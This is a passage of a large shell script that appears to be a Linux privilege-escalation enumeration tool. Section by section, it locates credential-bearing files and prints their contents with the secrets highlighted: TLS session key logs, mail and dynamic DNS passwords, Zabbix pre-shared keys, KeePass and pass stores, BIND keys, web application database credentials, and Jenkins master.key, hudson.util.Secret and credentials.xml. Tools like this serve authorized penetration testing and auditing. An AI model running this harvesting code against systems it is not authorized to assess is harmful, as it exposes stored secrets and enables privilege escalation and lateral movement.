  10675     if ! [ "`echo \"$PSTORAGE_PROXY_CONFIG\" | grep -E \"apt\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "apt.conf"; fi; fi; printf "%s" "$PSTORAGE_PROXY_CONFIG" | grep -E "apt\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,apt\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "Acquire::http::Proxy|Acquire::https::Proxy|proxy" | grep -Ev "^#" | sed -${E} "s,Acquire::http::Proxy|Acquire::https::Proxy|proxy,${SED_RED},g"; done; echo "";
  10676     if ! [ "`echo \"$PSTORAGE_PROXY_CONFIG\" | grep -E \"apt\.conf\.d$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "apt.conf.d"; fi; fi; printf "%s" "$PSTORAGE_PROXY_CONFIG" | grep -E "apt\.conf\.d$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,apt\.conf\.d$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "Acquire::http::Proxy|Acquire::https::Proxy|proxy" | grep -Ev "^#" | sed -${E} "s,Acquire::http::Proxy|Acquire::https::Proxy|proxy,${SED_RED},g"; done; echo "";done; echo "";
  10677 fi
  10678 
  10679 
  10680 if [ "$PSTORAGE_SNIFFING_ARTIFACTS" ] || [ "$DEBUG" ]; then
  10681   print_2title "Analyzing Sniffing Artifacts Files (limit 70)"
  10682     if ! [ "`echo \"$PSTORAGE_SNIFFING_ARTIFACTS\" | grep -E \"\.pcap$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.pcap"; fi; fi; printf "%s" "$PSTORAGE_SNIFFING_ARTIFACTS" | grep -E "\.pcap$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.pcap$,${SED_RED},"; done; echo "";
  10683     if ! [ "`echo \"$PSTORAGE_SNIFFING_ARTIFACTS\" | grep -E \"\.pcapng$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.pcapng"; fi; fi; printf "%s" "$PSTORAGE_SNIFFING_ARTIFACTS" | grep -E "\.pcapng$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.pcapng$,${SED_RED},"; done; echo "";
  10684     if ! [ "`echo \"$PSTORAGE_SNIFFING_ARTIFACTS\" | grep -E \"keys\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "keys.log"; fi; fi; printf "%s" "$PSTORAGE_SNIFFING_ARTIFACTS" | grep -E "keys\.log$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,keys\.log$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "CLIENT_RANDOM|SERVER_HANDSHAKE_TRAFFIC_SECRET|CLIENT_HANDSHAKE_TRAFFIC_SECRET|EXPORTER_SECRET|RESUMPTION_MASTER_SECRET" | sed -${E} "s,CLIENT_RANDOM|SERVER_HANDSHAKE_TRAFFIC_SECRET|CLIENT_HANDSHAKE_TRAFFIC_SECRET|EXPORTER_SECRET|RESUMPTION_MASTER_SECRET,${SED_RED},g"; done; echo "";
  10685     if ! [ "`echo \"$PSTORAGE_SNIFFING_ARTIFACTS\" | grep -E \"sslkeylog\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sslkeylog.log"; fi; fi; printf "%s" "$PSTORAGE_SNIFFING_ARTIFACTS" | grep -E "sslkeylog\.log$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sslkeylog\.log$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "CLIENT_RANDOM|SERVER_HANDSHAKE_TRAFFIC_SECRET|CLIENT_HANDSHAKE_TRAFFIC_SECRET|EXPORTER_SECRET|RESUMPTION_MASTER_SECRET" | sed -${E} "s,CLIENT_RANDOM|SERVER_HANDSHAKE_TRAFFIC_SECRET|CLIENT_HANDSHAKE_TRAFFIC_SECRET|EXPORTER_SECRET|RESUMPTION_MASTER_SECRET,${SED_RED},g"; done; echo "";
  10686 fi
  10687 
  10688 
  10689 if [ "$PSTORAGE_MSMTPRC" ] || [ "$DEBUG" ]; then
  10690   print_2title "Analyzing Msmtprc Files (limit 70)"
  10691     if ! [ "`echo \"$PSTORAGE_MSMTPRC\" | grep -E \"\.msmtprc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".msmtprc"; fi; fi; printf "%s" "$PSTORAGE_MSMTPRC" | grep -E "\.msmtprc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.msmtprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo "";
  10692 fi
  10693 
  10694 
  10695 if [ "$PSTORAGE_INFLUXDB" ] || [ "$DEBUG" ]; then
  10696   print_2title "Analyzing InfluxDB Files (limit 70)"
  10697     if ! [ "`echo \"$PSTORAGE_INFLUXDB\" | grep -E \"influxdb\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "influxdb.conf"; fi; fi; printf "%s" "$PSTORAGE_INFLUXDB" | grep -E "influxdb\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,influxdb\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,auth-enabled.*=.*false|token|https-private-key,${SED_RED},g"; done; echo "";
  10698 fi
  10699 
  10700 
  10701 if [ "$PSTORAGE_ZABBIX" ] || [ "$DEBUG" ]; then
  10702   print_2title "Analyzing Zabbix Files (limit 70)"
  10703     if ! [ "`echo \"$PSTORAGE_ZABBIX\" | grep -E \"zabbix_server\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "zabbix_server.conf"; fi; fi; printf "%s" "$PSTORAGE_ZABBIX" | grep -E "zabbix_server\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,zabbix_server\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,DBName|DBUser|DBPassword,${SED_RED},g"; done; echo "";
  10704     if ! [ "`echo \"$PSTORAGE_ZABBIX\" | grep -E \"zabbix_agentd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "zabbix_agentd.conf"; fi; fi; printf "%s" "$PSTORAGE_ZABBIX" | grep -E "zabbix_agentd\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,zabbix_agentd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,TLSPSKFile|psk,${SED_RED},g"; done; echo "";
  10705     if ! [ "`echo \"$PSTORAGE_ZABBIX\" | grep -E \"zabbix$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "zabbix"; fi; fi; printf "%s" "$PSTORAGE_ZABBIX" | grep -E "zabbix$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,zabbix$,${SED_RED},"; find "$f" -name "*.psk" | while read ff; do ls -ld "$ff" | sed -${E} "s,.psk,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo "";
  10706 fi
  10707 
  10708 
  10709 if [ "$PSTORAGE_GITHUB" ] || [ "$DEBUG" ]; then
  10710   print_2title "Analyzing Github Files (limit 70)"
  10711     if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.github$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".github"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.github$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.github$,${SED_RED},"; done; echo "";
  10712     if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.gitconfig$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".gitconfig"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.gitconfig$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.gitconfig$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
  10713     if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git-credentials$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".git-credentials"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git-credentials$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.git-credentials$,${SED_RED},"; done; echo "";
  10714     if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".git"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.git$,${SED_RED},"; done; echo "";
  10715 fi
  10716 
  10717 
  10718 if [ "$PSTORAGE_SVN" ] || [ "$DEBUG" ]; then
  10719   print_2title "Analyzing Svn Files (limit 70)"
  10720     if ! [ "`echo \"$PSTORAGE_SVN\" | grep -E \"\.svn$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".svn"; fi; fi; printf "%s" "$PSTORAGE_SVN" | grep -E "\.svn$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.svn$,${SED_RED},"; ls -lRA "$f";done; echo "";
  10721 fi
  10722 
  10723 
  10724 if [ "$PSTORAGE_KEEPASS" ] || [ "$DEBUG" ]; then
  10725   print_2title "Analyzing Keepass Files (limit 70)"
  10726     if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"\.kdbx$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.kdbx"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "\.kdbx$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.kdbx$,${SED_RED},"; done; echo "";
  10727     if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.config.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "KeePass.config*"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.config.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,KeePass\.config.*$,${SED_RED},"; done; echo "";
  10728     if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "KeePass.ini"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,KeePass\.ini$,${SED_RED},"; done; echo "";
  10729     if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.enforced.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "KeePass.enforced*"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.enforced.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,KeePass\.enforced.*$,${SED_RED},"; done; echo "";
  10730 fi
  10731 
  10732 
  10733 if [ "$PSTORAGE_PRE_SHARED_KEYS" ] || [ "$DEBUG" ]; then
  10734   print_2title "Analyzing Pre-Shared Keys Files (limit 70)"
  10735     if ! [ "`echo \"$PSTORAGE_PRE_SHARED_KEYS\" | grep -E \"\.psk$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.psk"; fi; fi; printf "%s" "$PSTORAGE_PRE_SHARED_KEYS" | grep -E "\.psk$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.psk$,${SED_RED},"; done; echo "";
  10736 fi
  10737 
  10738 
  10739 if [ "$PSTORAGE_PASS_STORE_DIRECTORIES" ] || [ "$DEBUG" ]; then
  10740   print_2title "Analyzing Pass Store Directories Files (limit 70)"
  10741     if ! [ "`echo \"$PSTORAGE_PASS_STORE_DIRECTORIES\" | grep -E \"\.password-store$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".password-store"; fi; fi; printf "%s" "$PSTORAGE_PASS_STORE_DIRECTORIES" | grep -E "\.password-store$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.password-store$,${SED_RED},"; ls -lRA "$f";done; echo "";
  10742 fi
  10743 
  10744 
  10745 if [ "$PSTORAGE_FTP" ] || [ "$DEBUG" ]; then
  10746   print_2title "Analyzing FTP Files (limit 70)"
  10747     if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"vsftpd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "vsftpd.conf"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "vsftpd\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,vsftpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "anonymous_enable|anon_upload_enable|anon_mkdir_write_enable|anon_root|chown_uploads|chown_username|local_enable|no_anon_password|write_enable" | sed -${E} "s,anonymous_enable|anon_upload_enable|anon_mkdir_write_enable|anon_root|chown_uploads|chown_username|local_enable|no_anon_password|write_enable|[yY][eE][sS],${SED_RED},g" | sed -${E} "s,\s[nN][oO]|=[nN][oO],${SED_GOOD},g"; done; echo "";
  10748     if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"\.ftpconfig$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.ftpconfig"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "\.ftpconfig$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.ftpconfig$,${SED_RED},"; done; echo "";
  10749     if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ffftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ffftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ffftp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ffftp\.ini$,${SED_RED},"; done; echo "";
  10750     if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ftp\.ini$,${SED_RED},"; done; echo "";
  10751     if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.config$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ftp.config"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.config$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ftp\.config$,${SED_RED},"; done; echo "";
  10752     if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"sites\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sites.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "sites\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sites\.ini$,${SED_RED},"; done; echo "";
  10753     if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"wcx_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wcx_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "wcx_ftp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,wcx_ftp\.ini$,${SED_RED},"; done; echo "";
  10754     if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"winscp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "winscp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "winscp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,winscp\.ini$,${SED_RED},"; done; echo "";
  10755     if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ws_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ws_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ws_ftp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ws_ftp\.ini$,${SED_RED},"; done; echo "";
  10756 fi
  10757 
  10758 
  10759 if [ "$PSTORAGE_SAMBA" ] || [ "$DEBUG" ]; then
  10760   print_2title "Analyzing Samba Files (limit 70)"
  10761     smbstatus 2>/dev/null
  10762     if ! [ "`echo \"$PSTORAGE_SAMBA\" | grep -E \"smb\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "smb.conf"; fi; fi; printf "%s" "$PSTORAGE_SAMBA" | grep -E "smb\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,smb\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "browseable|read only|writable|guest ok|enable privileges|create mask|directory mask|logon script|magic script|magic output" | sed -${E} "s,browseable.*yes|read only.*no|writable.*yes|guest ok.*yes|enable privileges.*yes|create mask.*|directory mask.*|logon script.*|magic script.*|magic output.*,${SED_RED},g" | sed -${E} "s,browseable.*no|read only.*yes|writable.*no|guest ok.*no|enable privileges.*no,${SED_GOOD},g"; done; echo "";
  10763 fi
  10764 
  10765 
  10766 if [ "$PSTORAGE_DNS" ] || [ "$DEBUG" ]; then
  10767   print_2title "Analyzing DNS Files (limit 70)"
  10768     if ! [ "`echo \"$PSTORAGE_DNS\" | grep -E \"bind$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "bind"; fi; fi; printf "%s" "$PSTORAGE_DNS" | grep -E "bind$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,bind$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; done; echo "";find "$f" -name "*.key" | while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";find "$f" -name "named.conf*" | while read ff; do ls -ld "$ff" | sed -${E} "s,named.conf.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#|//" | sed -${E} "s,allow-query|allow-recursion|allow-transfer|zone-statistics|file .*,${SED_RED},g"; done; echo "";done; echo "";
  10769 fi
  10770 
  10771 
  10772 if [ "$PSTORAGE_SEEDDMS" ] || [ "$DEBUG" ]; then
  10773   print_2title "Analyzing SeedDMS Files (limit 70)"
  10774     if ! [ "`echo \"$PSTORAGE_SEEDDMS\" | grep -E \"seeddms.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "seeddms*"; fi; fi; printf "%s" "$PSTORAGE_SEEDDMS" | grep -E "seeddms.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,seeddms.*$,${SED_RED},"; find "$f" -name "settings.xml" | while read ff; do ls -ld "$ff" | sed -${E} "s,settings.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "=" | sed -${E} "s,[pP][aA][sS][sS],${SED_RED},g"; done; echo "";done; echo "";
  10775 fi
  10776 
  10777 
  10778 if [ "$PSTORAGE_DDCLIENT" ] || [ "$DEBUG" ]; then
  10779   print_2title "Analyzing Ddclient Files (limit 70)"
  10780     if ! [ "`echo \"$PSTORAGE_DDCLIENT\" | grep -E \"ddclient\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ddclient.conf"; fi; fi; printf "%s" "$PSTORAGE_DDCLIENT" | grep -E "ddclient\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ddclient\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*password.*,${SED_RED},g"; done; echo "";
  10781 fi
  10782 
  10783 
  10784 if [ "$PSTORAGE_SENTRY" ] || [ "$DEBUG" ]; then
  10785   print_2title "Analyzing Sentry Files (limit 70)"
  10786     if ! [ "`echo \"$PSTORAGE_SENTRY\" | grep -E \"sentry$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sentry"; fi; fi; printf "%s" "$PSTORAGE_SENTRY" | grep -E "sentry$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sentry$,${SED_RED},"; find "$f" -name "config.yml" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.yml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,*key*,${SED_RED},g"; done; echo "";done; echo "";
  10787     if ! [ "`echo \"$PSTORAGE_SENTRY\" | grep -E \"sentry\.conf\.py$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sentry.conf.py"; fi; fi; printf "%s" "$PSTORAGE_SENTRY" | grep -E "sentry\.conf\.py$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sentry\.conf\.py$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo "";
  10788 fi
  10789 
  10790 
  10791 if [ "$PSTORAGE_STRAPI" ] || [ "$DEBUG" ]; then
  10792   print_2title "Analyzing Strapi Files (limit 70)"
  10793     if ! [ "`echo \"$PSTORAGE_STRAPI\" | grep -E \"environments$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "environments"; fi; fi; printf "%s" "$PSTORAGE_STRAPI" | grep -E "environments$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,environments$,${SED_RED},"; find "$f" -name "custom.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,custom.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "database.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,database.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "request.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,request.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "response.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,response.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "security.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,security.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "server.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,server.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";done; echo "";
  10794 fi
  10795 
  10796 
  10797 if [ "$PSTORAGE_CACTI" ] || [ "$DEBUG" ]; then
  10798   print_2title "Analyzing Cacti Files (limit 70)"
  10799     if ! [ "`echo \"$PSTORAGE_CACTI\" | grep -E \"cacti$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "cacti"; fi; fi; printf "%s" "$PSTORAGE_CACTI" | grep -E "cacti$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,cacti$,${SED_RED},"; find "$f" -name "config.php" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";find "$f" -name "config.php.dist" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.php.dist,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";find "$f" -name "installer.php" | while read ff; do ls -ld "$ff" | sed -${E} "s,installer.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";find "$f" -name "check_all_pages" | while read ff; do ls -ld "$ff" | sed -${E} "s,check_all_pages,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";done; echo "";
  10800 fi
  10801 
  10802 
  10803 if [ "$PSTORAGE_ROUNDCUBE" ] || [ "$DEBUG" ]; then
  10804   print_2title "Analyzing Roundcube Files (limit 70)"
  10805     if ! [ "`echo \"$PSTORAGE_ROUNDCUBE\" | grep -E \"roundcube$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "roundcube"; fi; fi; printf "%s" "$PSTORAGE_ROUNDCUBE" | grep -E "roundcube$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,roundcube$,${SED_RED},"; find "$f" -name "config.inc.php" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.inc.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "config\[" | sed -${E} "s,db_dsnw,${SED_RED},g"; done; echo "";done; echo "";
  10806 fi
  10807 
  10808 
  10809 if [ "$PSTORAGE_PASSBOLT" ] || [ "$DEBUG" ]; then
  10810   print_2title "Analyzing Passbolt Files (limit 70)"
  10811     if ! [ "`echo \"$PSTORAGE_PASSBOLT\" | grep -E \"passbolt\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "passbolt.php"; fi; fi; printf "%s" "$PSTORAGE_PASSBOLT" | grep -E "passbolt\.php$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,passbolt\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "host|port|username|password|database" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo "";
  10812 fi
  10813 
  10814 
  10815 if [ "$PSTORAGE_JETTY" ] || [ "$DEBUG" ]; then
  10816   print_2title "Analyzing Jetty Files (limit 70)"
  10817     if ! [ "`echo \"$PSTORAGE_JETTY\" | grep -E \"jetty-realm\.properties$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "jetty-realm.properties"; fi; fi; printf "%s" "$PSTORAGE_JETTY" | grep -E "jetty-realm\.properties$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,jetty-realm\.properties$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  10818 fi
  10819 
  10820 
  10821 if [ "$PSTORAGE_JENKINS" ] || [ "$DEBUG" ]; then
  10822   print_2title "Analyzing Jenkins Files (limit 70)"
  10823     if ! [ "`echo \"$PSTORAGE_JENKINS\" | grep -E \"master\.key$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "master.key"; fi; fi; printf "%s" "$PSTORAGE_JENKINS" | grep -E "master\.key$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,master\.key$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  10824     if ! [ "`echo \"$PSTORAGE_JENKINS\" | grep -E \"hudson\.util\.Secret$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "hudson.util.Secret"; fi; fi; printf "%s" "$PSTORAGE_JENKINS" | grep -E "hudson\.util\.Secret$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,hudson\.util\.Secret$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  10825     if ! [ "`echo \"$PSTORAGE_JENKINS\" | grep -E \"credentials\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "credentials.xml"; fi; fi; printf "%s" "$PSTORAGE_JENKINS" | grep -E "credentials\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,credentials\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,secret.*|password.*|token.*|SecretKey.*|credentialId.*,${SED_RED},g"; done; echo "";
  10826     if ! [ "`echo \"$PSTORAGE_JENKINS\" | grep -E \"config\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "config.xml"; fi; fi; printf "%s" "$PSTORAGE_JENKINS" | grep -E "config\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,config\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "secret.*|password.*|token.*|SecretKey.*|credentialId.*" | sed -${E} "s,secret.*|password.*|token.*|SecretKey.*|credentialId.*,${SED_RED},g"; done; echo "";
